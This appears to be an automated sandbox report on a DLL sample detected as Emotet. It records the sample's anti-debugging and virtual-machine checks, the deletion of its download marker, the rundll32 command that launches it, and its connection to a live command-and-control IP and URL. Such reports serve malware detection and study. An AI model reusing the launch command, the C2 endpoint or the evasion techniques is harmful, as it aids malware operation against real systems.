                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.944963869.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944733553.0000000000897000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944575719.0000000000897000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944564783.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.945060966.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000011.00000003.944571126.0000000000891000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.944726193.0000000000891000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: upwntdll.pdb source: WerFault.exe, 00000014.00000003.962626767.00000000048D5000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.962922934.00000000048D5000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000011.00000003.946657846.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.966528838.0000000004CD1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000011.00000003.944564783.000000000088B000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.945060966.000000000088B000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_6E7C6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 2_2_6E7C6A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 3_2_010213E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 6_2_003B13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 7_2_005C13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 12_2_010B13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 23_2_00EB13E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exe  Code function: 0_2_6E7AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exe  PE file moved: C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe  File opened: C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WerFault.exe  Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\cmd.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe  Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe TID: 2460; Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\svchost.exe; Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7C0927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7C0927 FindFirstFileExW,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 23_2_00ECE2C8 FindFirstFileW,
Source: C:\Windows\SysWOW64\rundll32.exe; File Volume queried: C:\ FullSizeInformation
Source: Amcache.hve.17.dr; Binary or memory string: VMware
Source: Amcache.hve.17.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.17.dr; Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.17.dr; Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.17.dr; Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.17.dr; Binary or memory string: VMware, Inc.
Source: Amcache.hve.17.dr; Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.17.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.17.dr; Binary or memory string: VMware7,1
Source: Amcache.hve.17.dr; Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.17.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.17.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000014.00000003.986775578.00000000048FB000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.988850293.00000000048FE000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.988815498.00000000048D0000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.1174922898.00000151084D2000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.1174714591.0000015108489000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.1175003928.00000151084EB000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
Source: Amcache.hve.17.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.17.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.17.dr; Binary or memory string: VMware, Inc.me
Source: Amcache.hve.17.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.17.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7AE690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7A1290 GetProcessHeap,HeapAlloc,HeapFree,
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7B9990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7BEC0B mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7C02CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7B9920 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7B9920 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7B9990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7BEC0B mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7C02CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7B9920 mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7B9920 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 3_2_010307D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_003C07D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 7_2_005D07D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 12_2_010C07D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 23_2_00EC07D2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe; Process queried: DebugPort
Source: C:\Windows\System32\loaddll32.exe; Process queried: DebugPort
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7BA462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7C0326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 2_2_6E7BAB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 45.63.5.129 187
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\IGidwJjoUs.dll",#1
Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 308
Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6888 -ip 6888
Source: C:\Windows\System32\svchost.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6888 -s 304
Source: loaddll32.exe, 00000000.00000000.958967461.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.957163784.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.939113865.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.940086206.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000017.00000002.1185190253.00000000036C0000.00000002.00020000.sdmp; Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000000.958967461.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.957163784.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.939113865.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.940086206.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000017.00000002.1185190253.00000000036C0000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000000.958967461.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.957163784.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.939113865.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.940086206.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000017.00000002.1185190253.00000000036C0000.00000002.00020000.sdmp; Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000000.958967461.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.957163784.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.939113865.0000000001770000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.940086206.0000000001770000.00000002.00020000.sdmp, rundll32.exe, 00000017.00000002.1185190253.00000000036C0000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\rundll32.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7BA584 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6E7BA755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: Amcache.hve.17.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match; File source: 12.2.rundll32.exe.10b0000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.1020000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1170000.9.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1170000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1203908.10.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.rundll32.exe.dd3740.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.rundll32.exe.3b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1203908.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.5c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1203908.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.1203908.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 23.2.rundll32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.rundll32.exe.dd3740.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1203908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1203908.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1170000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.rundll32.exe.a02240.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.10e34a0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.rundll32.exe.540000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1170000.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 23.2.rundll32.exe.eb0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.rundll32.exe.540000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1203908.10.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.1203908.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1170000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1203908.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.1020000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.rundll32.exe.a02240.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.loaddll32.exe.1170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.rundll32.exe.10b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.972240.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.rundll32.exe.972240.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 3.2.rundll32.exe.10e34a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1170000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.loaddll32.exe.1203908.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.913622906.00000000010CA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.958610660.0000000001170000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.958778791.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.939332319.00000000005C0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.939371192.000000000095A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.1030937060.0000000000DBA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.989427479.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.930427759.00000000009EA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000003.904116541.00000000006AB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.1031053353.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.989393299.0000000001170000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000003.1139622922.0000000000FAB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.914845954.0000000000540000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.940009942.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.956837036.0000000001170000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.939031365.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000017.00000002.1183917294.0000000000EB0000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.956978658.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.938967752.0000000001170000.00000040.00000010.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Process Injection 112 | Masquerading 2 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 2 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Security Software Discovery 41 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information 1 | NTDS | Virtualization/Sandbox Evasion 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Hidden Files and Directories 1 | LSA Secrets | Process Discovery 3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | System Information Discovery 24 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

[Behavior graph rendered as an image; recoverable content: Behavior Graph ID: 532314, Sample: IGidwJjoUs, Start date: 02/12/2021, Architecture: WINDOWS, Score: 84. Top-level signatures: Sigma detected: Emotet RunDLL32 Process Creation; Multi AV Scanner detection for submitted file; Yara detected Emotet. Process chain: loaddll32.exe starts rundll32.exe, cmd.exe, a further rundll32.exe and 3 other processes; cmd.exe and those rundll32.exe instances start further rundll32.exe instances (signature on the first: Hides that the sample has been downloaded from the Internet (zone.identifier)); one of the resulting rundll32.exe processes connects to 45.63.5.129, port 443, from local port 49794 (AS-CHOOPAUS, United States), triggering the signature "System process connects to network (likely due to code injection or exploit)"; svchost.exe starts two WerFault.exe processes; another svchost.exe contacts 192.168.2.1 (unknown).]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
IGidwJjoUs.dll | 18% | Virustotal | 
IGidwJjoUs.dll | 18% | ReversingLabs | Win32.Infostealer.Convagent

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

Source | Detection | Scanner | Label
0.2.loaddll32.exe.1170000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
3.2.rundll32.exe.1020000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.1170000.3.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.1170000.9.unpack | 100% | Avira | HEUR/AGEN.1110387
12.2.rundll32.exe.10b0000.1.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.1170000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
7.2.rundll32.exe.5c0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
0.0.loaddll32.exe.1170000.6.unpack | 100% | Avira | HEUR/AGEN.1110387
2.2.rundll32.exe.540000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
23.2.rundll32.exe.eb0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387
6.2.rundll32.exe.3b0000.0.unpack | 100% | Avira | HEUR/AGEN.1110387

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://45.63.5.129/vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIh | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://45.63.5.129/vIcMmPpXrabVVBXOJgaOKuPeOcCKPXUIh | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 0000001F.00000002.1175003928.00000151084EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.17.dr | false | | high
https://www.tiktok.com/legal/report/feedback | svchost.exe, 0000001F.00000003.1153314663.0000015108B7E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153380650.0000015109002000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153337846.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1153407395.0000015108B7E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://help.disneyplus.com. | svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://disneyplus.com/legal. | svchost.exe, 0000001F.00000003.1150795758.0000015108B8F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.1150829061.0000015108BD0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                        Contacted IPs


                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
45.63.5.129 | unknown | United States | 20473 | AS-CHOOPAUS | true

                        Private

                        IP
                        192.168.2.1

                        General Information

